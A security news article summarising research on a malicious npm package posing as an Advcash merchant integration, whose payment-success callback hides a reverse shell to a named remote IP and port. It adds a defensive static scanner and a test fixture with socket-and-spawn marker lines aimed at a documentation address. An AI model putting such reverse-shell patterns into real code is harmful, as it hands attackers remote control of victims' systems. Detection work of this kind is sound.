
A malicious npm package, disguised as a merchant integration for the Advcash payment platform, has been discovered to contain a reverse shell that triggers upon a successful payment transaction.
The Socket Threat Research team uncovered the package, @naderabdi/merchant-advcash, which implements functions for creating payment orders, validating requests, and updating transaction statuses. The report states that “The open source package quietly bundles a reverse shell inside a payment success callback”.
Advcash, described as “a lesser-known digital payment platform often used in gray-market crypto exchanges, offshore financial services, and certain high-risk e-commerce operations,” adds a layer of credibility to the malicious package. The report highlights that “While Advcash isn’t a household name like PayPal or Stripe, it occupies a distinct niche in the payments landscape, one that makes it a tempting disguise for attackers seeking plausible cover”.
The malicious package includes legitimate-looking business logic, such as hashing payment data and validating credentials, to further deceive developers. However, the key threat lies within the url_success() method, where a reverse shell is embedded to execute after a successful transaction. As the report emphasizes, “That moment where a payment has been completed and everything seems secure is precisely when the attacker seizes control”.
This reverse shell connects to a remote server (65.109.184.223) over TCP port 8443, granting the attacker remote control over the victim’s system. Unlike many malicious packages that execute code during installation, this payload is delayed until runtime, specifically after a successful transaction, making it more evasive.
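Because the payload only fires at runtime, install-time sandboxing of the package reveals nothing; a static pre-install triage of the source is a more useful check. The following is an added example written for this article (not Socket's scanner and not code from the package) that looks for the combination the report describes: a callback method whose body opens a raw socket, spawns a process, and names a hardcoded remote address. The two modules it scans are constructed fixtures using the TEST-NET address 203.0.113.10, not the real package source; the function and field names are this example's own.

```javascript
// Added example: a lightweight static triage check for npm package source.
// Not Socket's tooling and not the malicious package's code. The fixture
// modules below are constructed for the test (TEST-NET address 203.0.113.10).

const IPV4_LITERAL = /["'](\d{1,3}(?:\.\d{1,3}){3})["']/g;

// Pull out `name(args) {` ... matching `}` spans so each finding can be tied
// to a specific method such as a payment-success callback. Control-flow
// keywords are skipped; arrow functions are not extracted by this heuristic.
function extractFunctions(source) {
  const results = [];
  const header = /\b([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{/g;
  const keywords = new Set(['if', 'for', 'while', 'switch', 'catch', 'with']);
  let m;
  while ((m = header.exec(source)) !== null) {
    const name = m[1];
    if (keywords.has(name)) continue;
    let depth = 1;
    let i = header.lastIndex;
    while (i < source.length && depth > 0) {
      if (source[i] === '{') depth++;
      else if (source[i] === '}') depth--;
      i++;
    }
    results.push({ name, body: source.slice(m.index, i) });
  }
  return results;
}

// Flag any function that opens a raw TCP socket or spawns a process. Both in
// the same function body is the high-severity pattern; either alone warrants
// review. The `require` gate avoids false positives on unrelated `exec(` calls
// (for example RegExp.prototype.exec) in files that never load child_process.
function scanPackageSource(source) {
  const importsNet = /require\(["']net["']\)/.test(source);
  const importsChildProcess = /require\(["']child_process["']\)/.test(source);
  const findings = [];
  for (const fn of extractFunctions(source)) {
    const opensSocket =
      importsNet && /\bnet\.(connect|createConnection)\s*\(/.test(fn.body);
    const spawnsProcess =
      importsChildProcess && /\b(spawn|exec|execFile|execSync)\s*\(/.test(fn.body);
    if (!opensSocket && !spawnsProcess) continue;
    const endpoints = [...fn.body.matchAll(IPV4_LITERAL)].map((x) => x[1]);
    findings.push({
      name: fn.name,
      opensSocket,
      spawnsProcess,
      endpoints,
      severity: opensSocket && spawnsProcess ? 'high' : 'medium',
    });
  }
  const verdict = findings.some((f) => f.severity === 'high')
    ? 'block'
    : findings.length > 0 ? 'review' : 'pass';
  return { importsNet, importsChildProcess, findings, verdict };
}

// Constructed fixture: legitimate-looking merchant logic (SHA-256 signing)
// with marker lines in the success callback. The marker lines are not wired
// together and do nothing useful; they exist only to exercise the detector.
const SUSPECT_MODULE = `
const crypto = require("crypto");
const net = require("net");
const { spawn } = require("child_process");

class MerchantClient {
  constructor(config) { this.secret = config.secret; }
  sign(order) {
    return crypto.createHash("sha256").update(this.secret + order.id).digest("hex");
  }
  url_success(order) {
    const sock = net.connect(8443, "203.0.113.10");
    const child = spawn("sh");
    return { ok: true, order };
  }
}
`;

// Constructed fixture: the same business logic with a clean callback.
const BENIGN_MODULE = `
const crypto = require("crypto");

class MerchantClient {
  constructor(config) { this.secret = config.secret; }
  sign(order) {
    return crypto.createHash("sha256").update(this.secret + order.id).digest("hex");
  }
  url_success(order) {
    return { ok: true, status: "paid", order };
  }
}
`;

console.log(JSON.stringify(scanPackageSource(SUSPECT_MODULE), null, 2));
console.log(scanPackageSource(BENIGN_MODULE).verdict);
```

The check is deliberately narrow: it does not try to prove a reverse shell, only to surface a payment callback that has no business touching `net` or `child_process`, which is the review question a maintainer should be asked before such a dependency ships. It complements, rather than replaces, inspecting `package.json` install hooks, since this family of payload is designed to pass that inspection.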
The report also notes the sophistication of the disguise:
- “The package implements real business logic: hashing payment data, validating credentials, and mimicking a legitimate payment processing flow”.
- “The reverse shell is not a standalone file or script. It is embedded inside a method meant to handle payment success callbacks”.
- “The inclusion of realistic features, such as SHA-256 hashing, input validation, and merchant configuration, gives the package credibility, increasing the likelihood it would be adopted without suspicion”.
The discovery of this malicious package raises concerns about the potential for targeted attacks on merchants using Advcash or the broader use of malware-as-a-service within smaller payment ecosystems. The report concludes with a warning: “Even packages that appear purpose-built for e-commerce or payments can be Trojan horses for deeper compromises”.